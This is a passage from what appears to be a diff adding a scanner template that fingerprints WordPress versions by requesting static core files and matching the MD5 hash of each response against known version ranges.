md5(body))" + - type: dsl + name: 2.7 - 3.3.3 + dsl: + - "(\"8da76e497b2666873eaa3b2f9f19617b\" == md5(body))" + - type: dsl + name: 2.3.1 - 2.6.5 + dsl: + - "(\"3dad0a2b069875a78bfc7c21554f0a24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpicons.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6453fcf875718d91560f5faedce361f4\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"066d3d4d2b5b1f32ea2ee76f536aa445\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"90dd81a3ac5697aca79a34a9b1bfa8fa\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/icon-pointer-flag.png" + matchers: + - type: dsl + name: 3.3 - 5.6 + dsl: + - "(\"b0d32c87f2ad8bc2455ebf6a60171027\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-comments.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"4cc2365d0450dedec30cec2e73a8a1d4\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-icon.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"311d098eca9a89370877334b1b8f992a\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-watermark.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"3b9a87754d6ddcad447c89778e93c544\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c173b88f257603b0ea51aec2c03bec4b\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"708ebef70c64f23294d63347ececebe7\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/images/uploader-icons.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"b4011d935c0f4dcf0cffc0f99d6d9680\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"707b402719c2a935cc7106b1b60bffee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/toggle-arrow-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"46cae1ca5cf883f4c91243447215ef11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/toggle-arrow.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"dcdfce879761fde6123beb64cecf2af2\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"8e9022f98e990584452838f85d77c928\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"e5064769584f17a701131db269226700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/uploader-icons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"adc1e7b0262d80e44f18a287c395cb7e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c1b082fb2f7786b2562c601497ea5dbc\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"ef35cb53941bef570b89317c4fba357c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/w-logo-blue.png" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"eb51ac1312eb060b9bc638fef46f80ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f86b87253d8c6afb3197eebe4695a7a4\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"aae29dcdbdab4a1fbe6696c9f6b82cf0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f33596ef4918f4902d084f1ccf3261f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/rss-2x.png" + matchers: + - 
type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c71759615ba051c1e6f597fd726a9d11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/text.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"7ab98773e6e430f718c89d9f5119804b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/document.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"76e5349938f6ce9179931436de1c64a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/interactive.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"52d7accb82aef17fc2c3b4c58968dc48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/spreadsheet.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f1c0a034e4f112d60054fcdecc873fb2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"8de0e9f175ea68179b81dddb71a010f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/code.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"2d6f96130cad55ca9310eed555a9555f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/default.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"2db6a9e6cd49d2429668ce40e0dee762\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/archive.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"113914d2eedff268fb00dad3c3ac9175\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"8674614341f1bec5feb22eb7e75adfc0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/icon-pointer-flag-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"a9e5e1a632f1b3b962e4c426d55acc72\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-includes/images/wpicons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"c3e76ed756c4056fa9249a944f667e37\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"dd625d0d794415c1fbb229f4f10218c8\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e7792025943f6c6f219e566bf2f79aa9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/arrow-pointer-blue.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"779ffc62e3ce872a4cabb2c35bbb14f9\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"5703fed2bbf0319df846ad18b980b1a1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"53cf11a41f973a80570e0ecac5d3fe5e\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"62834b32c7fff8e341ed4b77292a4555\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"063f8eaa151e3f80e037a977a70c9d82\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"f22dab01a22a010df54fddbef11f0d73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/mrgreen.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"2d35c1e05eb1949106d34add6a9d9dda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/simple-smile.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"e94bb2cf7bc285138eb166b201779768\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/frownie.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"519bf3d0051b841e0cb08dc4f4831eed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/rolleyes.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"20bebef0054f851332df4f66dda3698d\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/images/arrow-pointer-blue-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"256de214110572de8c5d34b8391163cf\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8b6f52b65ca4d5805b061266d8bd3817\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"431a3e3d7139b7a17b7663c02246445d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/text.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"90cc20d1b2aafc23be64ff2511e35bb5\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"681932d1f666acaa97582ecb22309011\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"17c0cf58506a41596a42a7a28030e951\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/document.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"7f89275e639a73c0f9c4448bf933545c\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"5d9bd2b7c1a6de4cd60db260705a0d4a\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"e6d7abf70fe3653e0e7208da55b3dbdc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/interactive.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"af52cf6d60f2edba609939a70304e601\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"534872ce342d27be12c21a24a3c960ea\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"cc537b760f40258679df957cbe061a0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/spreadsheet.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"358639f8d0a20c318054cb01c76ea4ea\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"b0b5df1b422cc9300b05604a7a71b06c\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"b3954af9d01078755e8d2e8e819bb31a\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/images/crystal/video.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"94010edbfd8e6ca589daa4b83bf53d0b\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c8caf92649ddfbd515b97a455f91d113\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/code.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"1460ef31b2cffaef1cb012f531ae391f\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"7943ed0e713a89c87601daec06ba272d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/license.txt" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f05db54c63e36918479b6651930dcfe7\" == md5(body))" + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"f01b121b601cac57c42110e8d2fc7e32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/default.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"41f23e292a2fbedc21ecae2d04f29bba\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fe5f6af8b942a9ed1d5754b1e0e5ea90\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"d510e9e0ac0d9dd2af7a846029c69e2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/archive.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"9653ca07faf08e9ccc493041020e6eeb\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"fbaa067099eb73e2dcecb3f29033e0fa\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"93a5da9e9cb5553d570a271c5b6e98fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/audio.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"996e56f18f3ac9cf89f347d8d42d236b\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"6b1b3153b950cb7d88b0790445892365\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"b9daa96636b39b9c94475ee4f2686e11\" == md5(body))" 
+ - method: GET + path: + - "{{BaseURL}}/wp-includes/images/rss.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"a5b05bbf28f294b02efd942a4e5ab806\" == md5(body))" + - type: dsl + name: 2.2 - 3.4.2 + dsl: + - "(\"0ee254a56334189fd471afeec067186f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/license.commercial.txt" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"0a3b670896fc4a8067adb2c6d978418e\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"d34bd7474420e22e7da463b44833a5f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.css" + matchers: + - type: dsl + name: 4.4 - 5.6 + dsl: + - "(\"eeb729369ef309d89ed0bc7120aacadf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.xap" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"747100c185cf33f6588930a5941d62f7\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"3c524750546de1b3aab36ff60719aebb\" == md5(body))" + - type: dsl + name: 3.7.2 - 3.8.35 + dsl: + - "(\"40dbc8d7df259f4d2df35c89c63a818b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.1 + dsl: + - "(\"890f8967069133b1dc5a8caf35778284\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"7c8989ad91007dccb1bb4f754e9ad511\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"f3c8aaf882d1ed25a7f5fe7fd2ee4d9d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"f571e35c675f9ae38d144501153c622b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.swf" + matchers: + - type: dsl + name: 3.9.12 - 4.8.15 + dsl: + - "(\"370d768e45524f47fbd2988974d3d76c\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"f14859fd400ef63a7a8568986d58a756\" == md5(body))" + - type: dsl + name: 3.9.4 - 4.3.3 + dsl: + - "(\"aeb99cfd67b07d467f9c39c1228c7e53\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.1 + 
dsl: + - "(\"7029eb89afd82d9845f711c93ca1cb47\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.8.13 + dsl: + - "(\"ee056b175f2ac1fef496493783403b69\" == md5(body))" + - type: dsl + name: 3.7.14 - 3.8.35 + dsl: + - "(\"ed20d984b757ad5291963389fc209864\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"70fe6deae2bdb29aa32d3565bf20ff0a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"e0608fadfa2ed83ee4c2a6e223c2d668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/license.txt" + matchers: + - type: dsl + name: 3.3 - 5.6 + dsl: + - "(\"751419260aa954499f7abaabaa882bbe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.full.min.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"4a431fb4049b24566d27c12e2793d818\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"9349f636c747a5e983020a1cb7213a44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.js" + matchers: + - type: dsl + name: 4.4 - 5.6 + dsl: + - "(\"73a1d77b4e827c45061f4fab041030a9\" == md5(body))" + - type: dsl + name: 3.5 - 4.3.25 + dsl: + - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f5bd5c7e83c8f1f24ba27f8cf4c6085a\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"8156bfae0ea8bccaf938c35ed9e1bdf5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-v.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"20c97a21993cf137ead9fdbecbc42aa8\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"a786bb7ed6d1cdc6146f086a22d0342d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-h.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - 
"(\"5ac3c42cc86e745a5e36b67b4c70a134\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"50da31b23fdd3f5585dffd363c310456\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/imgareaselect.css" + matchers: + - type: dsl + name: 3.4 - 5.6 + dsl: + - "(\"7d28cad92829b3d633a087b5f3b595af\" == md5(body))" + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"ab3433daec7c5e17e5383221dc507f61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/macFFBgHack.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"189217c8b067ef86add757922c2f75b4\" == md5(body))" + - type: dsl + name: 2.6.1 - 3.4.2 + dsl: + - "(\"6e63d8058c61e28953cc285de8d5c37d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/loadingAnimation.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"ce2268030dd2151b63cdf4ffc2f626ba\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c33734a1bf58bec328ffa27872e96ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.js" + matchers: + - type: dsl + name: 2.1 - 5.6 + dsl: + - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"391e1442721d3c66ebf1cee6a073017f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.speed.js" + matchers: + - type: dsl + name: 2.8.6 - 4.8.15 + dsl: + - "(\"415a3787846bb6c2d745602c2afb73ac\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.5 + dsl: + - "(\"d840d5988a2b8b64350faed539041550\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.queue.js" + matchers: + - type: dsl + name: 2.8 - 4.8.15 + dsl: + - "(\"9953522fbd4a1b02bbf635a92d76cd8f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - 
"(\"128c6fd1f7089b1799bdc47ae18efc0e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"46c7296d397c6f18dce3e70e2a35ecf4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.swfobject.js" + matchers: + - type: dsl + name: 3.2 - 4.8.15 + dsl: + - "(\"ccb51571a75637db08545caaf2ed9e73\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"cea8193a75561bb8ba40ea1809b96c67\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"56dccb3713a2375836b1167bbb66499d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.cookies.js" + matchers: + - type: dsl + name: 2.7 - 4.8.15 + dsl: + - "(\"7fa57ec00dda88dd6b5c2037ccb4d5cf\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"ffef6fda1b57107891c9a75ef2e1ae44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/license.txt" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"cbe05bb060c85e07882dc06ff751577a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"cb7eb7a25a67239e6fb1408ee9068895\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.query.js" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"3bcc587af2c7b01fc6fbc9c077050143\" == md5(body))" + - type: dsl + name: 3.1 - 3.5.2 + dsl: + - "(\"679e260910bac070e9aa6edda8e27577\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.min.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.serialize-object.js" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"d15c29a18d9ffa8b9b4ae86c3c0cfa22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.min.js" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - 
"(\"7311075c2b411b299c94e36e2e3bab89\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"21a79ede04fa5ee9017e6bdbdba5bfe9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"67bea18c057fd6c257d08e55a1090708\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.masonry.min.js" + matchers: + - type: dsl + name: 4.6.1 - 5.6 + dsl: + - "(\"cd0eb3406096ff80266e7c9d7d419186\" == md5(body))" + - type: dsl + name: 3.9 - 4.6 + dsl: + - "(\"928adcedcd52b828e51f9ec291655e01\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc2d7669d58e909815f1994047bf671c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.min.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.ui.touch-punch.js" + matchers: + - type: dsl + name: 3.4 - 5.6 + dsl: + - "(\"4cc86d1003c45134d6838f13e3885db1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.js" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"3a2474569145d51ecabf7fc4fb078982\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"bf55f3b46b05aa372a0bed97b848de9e\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"e4521a3a3b4fa0c65aac63809afb12de\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"9044d9d8599a013f7c0ca8120501c188\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3e00f1c2b48d86206943ab16d61f0336\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - 
"(\"a4c05e4240802706a7fa33ca1e6a8c74\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"286515e993f6d145276fcf24f4c4a352\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"024d7dd8ff67d41aff4f2735e63eb432\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.schedule.js" + matchers: + - type: dsl + name: 2.5 - 5.6 + dsl: + - "(\"0426b39754aa6bc766d89ea4c41bbd06\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.js" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"a706ead694231e74fd6750b1670580a5\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1f2b7451ea26d4fdf7539197df8438ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.js" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"e29483a8ca26a0dd8b0d1146c6b0a6e9\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"f27ed67b7faedaff1bdaaad859692e6a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfobject.js" + matchers: + - type: dsl + name: 3.3.2 - 5.6 + dsl: + - "(\"9ffdba2cff497d701684657e329871f5\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.1 + dsl: + - "(\"892a543f3abb54e8ec1ada55be3b0649\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"eaa5417940c71f441b016b12c534665d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.svg" + matchers: 
+ - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"746c3af7a145a09239a36e5ef61cfea0\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"ea090d716dd05e4024c29283f3c88d0d\" == md5(body))" + - type: dsl + name: 3.6 - 3.9.33 + dsl: + - "(\"d71b376560d2d95d10a4017a2178d0d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/froogaloop.min.js" + matchers: + - type: dsl + name: 4.2 - 4.8.15 + dsl: + - "(\"2a8742c0ac1cdbec23be44a7d4e9a3c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.png" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"716436fb3df0d29e6b37dd62d952676a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/controls.svg" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"40f56f5a736da4effeb790cedb8a52f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/jumpforward.png" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"15e1ac8cbacc2efdf1ac2677de48a253\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/controls.png" + matchers: + - 